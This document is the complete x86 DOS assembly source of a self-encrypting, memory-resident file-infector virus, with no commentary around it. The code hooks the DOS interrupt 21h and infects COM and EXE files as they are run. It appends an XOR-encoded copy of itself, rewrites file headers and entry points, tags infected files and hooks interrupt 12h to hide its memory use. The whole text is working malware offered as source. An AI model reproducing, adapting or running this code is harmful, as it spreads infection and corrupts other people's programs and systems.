baseoff equ 107hcode	segment	assume cs:code,ds:code,es:code,ss:code	org 100hmain:		mov ax,offset begin	jmp ax		db 'cr'		begin:		push es	push ds		mov ax,cs	mov ds,ax	mov es,ax		call get_ip		push ax	mov ax,offset encodebegin	jmp short get_ip_end	oldhead	db 0h,4ch,0cdh,21h,6 dup (?)get_ip	label near	mov bp,sp	mov bx,[bp]	retget_ip_end:	sub bx,112h		;get current offset	add ax,bx	push ax	pop di	mov si,di	cld	mov cx, offset endtag-offset encodebegin	mov dl, byte ptr [oldhead+bx]	push sidecode:		lodsb	xor al,dl	stosb			;decode at runtime	loop decode	retf			;retf  cs:ip=encodebegin	db 62h	db 65hencodebegin:	mov ax,9f80h	mov es,ax	cmp es:word ptr [virustag-baseoff],7263h	jz alreadyresident				push ds		mov ax,40h	mov ds,ax	mov di,13h	;get free memory	sub word ptr [di],2	pop ds	mov di,0	mov si,bx	add si,baseoff	mov cx,2048	cld	rep movsb	;resident in memory		nop	push bx		mov ax,9f80h	mov ds,ax	mov ax,3521h	int 21h	mov ds:word ptr[oldint21-baseoff],bx	mov dx,bx	mov ds:word ptr[oldint21-baseoff+2h],es		mov dx,offset newint21proc-baseoff	mov ax,2521h	int 21h	mov dx,offset newint12proc-baseoff	mov ax,2512h	int 21h	pop bx	alreadyresident:	mov ax,cs	mov ds,ax	mov es,ax	mov si,offset oldhead	add si,bx	mov di,0100h		cmp cs:word ptr oldhead[bx],6163h	;this is an infected EXE file 	jz GotoExe		cld	mov cx,7	rep movsb		pop ds	pop es		cmp cs:word ptr oldhead[bx],4c00h	jz go_outGotoOldHead:					;this is an infected COM file	mov ax,0100h	jmp axGotoExe:	pop ds	pop es	mov ax,ds	add ax,cs:ini_ss[bx]			;set old ss	add ax,10h	mov ss,ax	mov ax,cs:ini_sp[bx]			;set old sp	mov sp,ax	mov ax,ds	add ax,10h	add cs:ini_cs[bx],ax			;set old cs	jmp cs:dword ptr ini_ip[bx]		;jump to the normal EXE go_out:	mov ah,4ch	int 21h	oldint21 dw 2 dup(?)filehead db 18h dup (?)filesize dw 2 dup(?)virustag db 'cr'infecthead:		mov ax,offset begin	jmp ax	db 'cr'temp	dw ?ini_ip	dw ?ini_cs	dw ?ini_ss	dw ?ini_sp	dw ?newint21proc:	cmp ah,4bh	jz tryinfect	jmp int21htryinfect:	push ax			;begin to infect	push cx	push es	push di	push bx	push dx	push ds	mov ax,3d02h	int 21h	jnc openok	jmp notinfect		;open fail? not infectopenok:		push ds	push dx	push cs	pop ds	mov dx,offset filehead-baseoff	mov bx,ax	mov cx,18h	mov ah,3fh	int 21h		pop dx	pop ds	jc closefilenear		;read fail? not infect		mov di,offset filehead-baseoff	mov ax,9f80h	mov es,ax		cmp word ptr es:[di],5a4dh	;'MZ' in head? EXE file...	jnz COM_infect	jmp EXE_infect	COM_infect:		cmp word ptr es:[di+5],7263h	;'cr' in 105h? not infect	jz closefilenear   	call getfilesize	cmp dx,0	jnz closefilenear			; file is too big..not infect	cmp ax,63000	ja  closefilenear			; file is too big..not infect	cmp ax,10	jb  closefilenear			; file is too small..not infect		;infect begin,hahahahaha....	jmp infectbeginclosefilenear:	jmp closefileinfectbegin:		mov ax,9f80h	mov ds,ax	mov es,ax	mov si,offset filehead-baseoff	mov di,offset oldhead-baseoff	mov cx,10	cld	rep movsb			;save the old file head		call addvirustofile	call mov_ptr_to_head	mov di,offset infecthead-baseoff	mov dx,di	inc di	mov cx,word ptr [filesize-baseoff]	add cx,100h	mov word ptr [di],cx	mov cx,7	mov ah,40h	int 21h		closefile:	mov ah,3eh	int 21h				; close the file	notinfect:	pop ds	pop dx	pop bx	pop di	pop es	pop cx	pop axint21h:	jmp dword ptr cs:[oldint21-baseoff]	getfilesize proc near	mov ax,4202h	xor cx,cx	xor dx,dx	int 21h	jc  closefile	mov es:word ptr [filesize-baseoff],ax	mov es:word ptr [filesize-baseoff+2],dx		;save the file size	retgetfilesize endpaddvirustofile proc near	xor dx,dx	mov ah,40h	mov cx,offset encodebegin-offset begin	int 21h	jc closefile			;write fail... not infect	cmp ax,cx	jb closefile			;write fail... not infect		mov cx,(offset endtag-offset encodebegin)/2+(offset endtag-offset encodebegin)MOD 2	mov dl,byte ptr oldhead-baseoff	mov dh,dl	mov di,dx	mov si,offset encodebegin-baseoff	mov dx,offset temp-baseoffencode_myself:	push cx	lodsw	xor ax,di			;encode and then write into file	mov temp-baseoff,ax	mov ah,40h	mov cx,2	int 21h	jc closefile			;write fail... not infect	cmp ax,cx	jb closefile			;write fail... not infect	pop cx	loop encode_myself	retaddvirustofile endp	mov_ptr_to_head proc near	mov ax,4200h	xor cx,cx	xor dx,dx	int 21h	jc closefile		retmov_ptr_to_head endpEXE_infect proc near	mov ax,es:word ptr[di+2]		;exe size in the last sector	mov dx,es:word ptr[di+4]		;total sectors of exe size	push di	dec dx	mov cx,9	xor si,siget_size_in_head:	shl dx,1	shl si,1	adc si,0	loop get_size_in_head	add dx,ax	adc si,0	mov di,dx		call getfilesize			;get the exe file size	cmp dx,si	jnz exe_end_near			;not equal(file size and loading size)	cmp dx,0fh				;not infect	ja  exe_end_near	cmp ax,di	pop di	jnz exe_end_near		jmp begininfectexeexe_end_near:	jmp exe_end		;begin to infect exebegininfectexe:		mov ax,writesize+10	mov cl,9		add ax,es:word ptr[di+2]		;add exe loading size	mov si,ax	and ax,1ffh	mov es:word ptr[di+2],ax	shr si,cl	add es:word ptr[di+4],si	push es	pop ds	mov word ptr[oldhead-baseoff],6163h	;write EXE's tag	mov ax,[di+14h]	mov [ini_ip-baseoff],ax	mov ax,[di+16h]	mov [ini_cs-baseoff],ax	mov ax,[di+10h]	mov [ini_sp-baseoff],ax	mov ax,[di+0eh]	mov [ini_ss-baseoff],ax			;save the old ss,sp,cs,ip			push di	call addvirustofile	pop di	call mov_ptr_to_head	mov ax,filesize-baseoff	mov dx,[di+08h]	mov cl,4	shl dx,cl				;dx=exe header size	sub ax,dx	push ax	and ax,0fh	mov [di+14h],ax				;modify sp,ip	mov [di+10h],writesize+50	add word ptr [di+0ah],writesize/16+1	;add the memory needed	pop ax	mov dx,filesize+2-baseoff	mov cl,4modify_cs:	shr dx,1	rcr ax,1	loop modify_cs	mov [di+16h],ax					mov [di+0eh],ax				;modify cs and ss		mov dx,di	mov cx,18h	mov ah,40h	int 21hexe_end:	jmp closefileEXE_infect endp	newint12proc:	mov ax,640	iretwritesize	equ $-beginendtag:code	ends	end main